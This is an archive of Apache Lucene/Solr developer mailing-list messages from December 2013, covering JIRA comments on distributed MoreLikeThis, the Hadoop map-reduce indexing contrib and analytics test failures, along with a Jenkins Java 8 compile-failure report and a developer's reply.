Bill Mitchell commented on SOLR-788:


Suneel Marthi's issue above, where the derivative query passed to the shard is 
invalid, is similar to the issue I documented for numeric keys in SOLR-5521. 
Here, the query terms extracted from the bean for which we are searching for 
similar beans include terms with embedded colons. When the MoreLikeThis 
component under the search handler builds a MoreLikeTheseQuery, the extracted 
query terms need to be quoted.
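
A minimal sketch of the kind of quoting/escaping involved, using SolrJ's 
{{ClientUtils}} (the term value is made up):

{code:java}
import org.apache.solr.client.solrj.util.ClientUtils;

public class EscapeColonDemo {
  public static void main(String[] args) {
    String term = "urn:example:123";  // a term with embedded colons
    // Escaped form is safe to splice into a shard query: urn\:example\:123
    System.out.println(ClientUtils.escapeQueryChars(term));
    // Quoting the whole term works as well: "urn:example:123"
    System.out.println('"' + term + '"');
  }
}
{code}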

> MoreLikeThis should support distributed search
> --
>
> Key: SOLR-788
> URL: https://issues.apache.org/jira/browse/SOLR-788
> Project: Solr
>  Issue Type: Improvement
>  Components: MoreLikeThis
>Reporter: Grant Ingersoll
>Assignee: Mark Miller
>Priority: Minor
> Fix For: 4.1, 5.0
>
> Attachments: AlternateDistributedMLT.patch, MLT.patch, MLT.patch, 
> MoreLikeThisComponentTest.patch, SOLR-788.patch, SOLR-788.patch, 
> SolrMoreLikeThisPatch.txt
>
>
> The MoreLikeThis component should support distributed processing.
> See SOLR-303.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837049#comment-13837049
 ] 

Mark Miller commented on SOLR-1301:
---

Hmm...yeah, you might as well. I'll investigate on my VM.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When a reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837036#comment-13837036
 ] 

Uwe Schindler commented on SOLR-1301:
-

I found out that some tests don't work on Windows, for the same reason the 
MiniDFS tests don't work in Solr core: some crazy command line tools are 
missing. I would mark all those tests with the same assume as the 
HdfsDirectory tests.

Should I start doing this?
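
A sketch of what that assume could look like, modeled on the HdfsDirectory 
tests (the class name and message are illustrative):

{code:java}
import org.apache.lucene.util.Constants;
import org.apache.solr.SolrTestCaseJ4;
import org.junit.BeforeClass;

public class MorphlinesWindowsAssumeTest extends SolrTestCaseJ4 {
  @BeforeClass
  public static void assumeNotWindows() {
    // Skip (rather than fail) on Windows, where Hadoop's helper
    // command line tools are not available.
    assumeFalse("Hadoop command line tools are missing on Windows",
        Constants.WINDOWS);
  }
}
{code}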

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When a reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837032#comment-13837032
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547232 from [~thetaphi] in branch 'dev/trunk'
[ https://svn.apache.org/r1547232 ]

SOLR-1301: Fix compilation for Java 8 (the Java 8 compiler is more picky, but 
it's not a Java 8 regression: the code was just wrong)

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When a reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



RE: [JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8548 - Still Failing!

2013-12-02 Thread Uwe Schindler
This is wrong code, just not detected by Java 7.

I'll fix.
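
The likely shape of the fix, sketched under one assumption (that the raw 
{{Collections.EMPTY_LIST}} in the quoted output below is the culprit): a raw 
argument makes the whole generic call unchecked, its result is erased to a raw 
{{List}}, and the for-each loop variable becomes {{Object}}.

{code:java}
import java.util.Collections;
import java.util.List;

public class RawEmptyListDemo {
  // Stand-in for the morphlines helper; generic, like the real one presumably is.
  static <T> List<T> getStringList(List<T> defaults) {
    return defaults;
  }

  public static void main(String[] args) {
    // javac 8 rejects this: the raw EMPTY_LIST erases the call's result to a
    // raw List, so the loop variable is Object, not String:
    //   for (String s : getStringList(Collections.EMPTY_LIST)) { ... }

    // Fine: the typed factory keeps the element type.
    for (String s : getStringList(Collections.<String>emptyList())) {
      System.out.println(s);
    }
  }
}
{code}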

-
Uwe Schindler
H.-H.-Meier-Allee 63, D-28213 Bremen
http://www.thetaphi.de
eMail: u...@thetaphi.de


> -Original Message-
> From: Policeman Jenkins Server [mailto:jenk...@thetaphi.de]
> Sent: Monday, December 02, 2013 11:17 PM
> To: dev@lucene.apache.org; markrmil...@apache.org
> Subject: [JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build #
> 8548 - Still Failing!
> 
> Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8548/
> Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC
> 
> All tests passed
> 
> Build Log:
> [...truncated 16249 lines...]
> [javac] Compiling 3 source files to /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/contrib/solr-morphlines-cell/classes/java
> [javac] warning: [options] bootstrap class path not set in conjunction with -source 1.7
> [javac] /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java:127: error: incompatible types: Object cannot be converted to String
> [javac]   for (String capture : getConfigs().getStringList(config, ExtractingParams.CAPTURE_ELEMENTS, Collections.EMPTY_LIST)) {
> [javac]   ^
> [javac] Note: /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java uses or overrides a deprecated API.
> [javac] Note: Recompile with -Xlint:deprecation for details.
> [javac] Note: /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java uses unchecked or unsafe operations.
> [javac] Note: Recompile with -Xlint:unchecked for details.
> [javac] 1 error
> 
> [...truncated 1 lines...]
> BUILD FAILED
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:400: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:39: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:37: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build.xml:209: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:441: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:491: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/lucene/common-build.xml:476: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/lucene/common-build.xml:1732: Compile failed; see the compiler error output for details.
> 
> Total time: 51 minutes 47 seconds
> Build step 'Invoke Ant' marked build as failure
> Description set: Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC
> Archiving artifacts
> Recording test results
> Email was triggered for: Failure
> Sending email for trigger: Failure
> 



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837001#comment-13837001
 ] 

Mark Miller commented on SOLR-1301:
---

Removing solr from the module names sounds good to me.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When a reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Erick Erickson (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836998#comment-13836998
 ] 

Erick Erickson commented on SOLR-5488:
--

It seems to happen at least once or twice a night on some of the test machines. 
I cannot make it happen at will, or at all on my machine for that matter.

If you subscribe to the dev list, you'll see them pretty much every day, 
particularly in the morning. It may be that this happens with some of the 
@Nightly runs, but I can't seem to reproduce them, even with the seeds. See: 
http://lucene.apache.org/solr/discussion.html and the dev@lucene.apache.org 
list.
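
(For reference, the Jenkins failure mails carry a reproduce line of roughly 
the form {{ant test -Dtestcase=... -Dtests.method=... -Dtests.seed=...}}, plus 
{{-Dtests.nightly=true}} for @Nightly runs; the placeholders have to be filled 
in from the mail, and the exact flags are the common-build ones.)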

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836988#comment-13836988
 ] 

Uwe Schindler commented on SOLR-1301:
-

Hi,
it seems to resolve correctly now. There is one inconsistency: the folder 
names. The new contribs all have "solr-" in the folder name, which is 
inconsistent with the others. I would prefer to rename the folders with 
{{svn mv}} and maybe fix some paths in dependencies and Maven. The build.xml 
files already use the correct name, so the JAR files are named correctly.
Uwe
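
(Roughly {{svn mv solr/contrib/solr-morphlines-core solr/contrib/morphlines-core}}, 
and likewise for the other new contribs; the target names here are an 
assumption, not a decision.)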

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When a reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8548 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server
Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8548/
Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC

All tests passed

Build Log:
[...truncated 16249 lines...]
[javac] Compiling 3 source files to /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/contrib/solr-morphlines-cell/classes/java
[javac] warning: [options] bootstrap class path not set in conjunction with -source 1.7
[javac] /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java:127: error: incompatible types: Object cannot be converted to String
[javac]   for (String capture : getConfigs().getStringList(config, ExtractingParams.CAPTURE_ELEMENTS, Collections.EMPTY_LIST)) {
[javac]   ^
[javac] Note: /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java uses or overrides a deprecated API.
[javac] Note: Recompile with -Xlint:deprecation for details.
[javac] Note: /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java uses unchecked or unsafe operations.
[javac] Note: Recompile with -Xlint:unchecked for details.
[javac] 1 error

[...truncated 1 lines...]
BUILD FAILED
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:400: The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:39: The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:37: The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build.xml:209: The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:441: The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:491: The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/lucene/common-build.xml:476: The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/lucene/common-build.xml:1732: Compile failed; see the compiler error output for details.

Total time: 51 minutes 47 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Houston Putman (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836982#comment-13836982
 ] 

Houston Putman commented on SOLR-5488:
--

I'm all for putting this in 4.x. 

Regarding the test failures with weird nulls in the results, I don't know what 
the issue is... How often does it happen?

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836945#comment-13836945
 ] 

Mark Miller commented on SOLR-1301:
---

One issue that I had to work around will be solved with 
https://issues.apache.org/jira/browse/YARN-1442

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
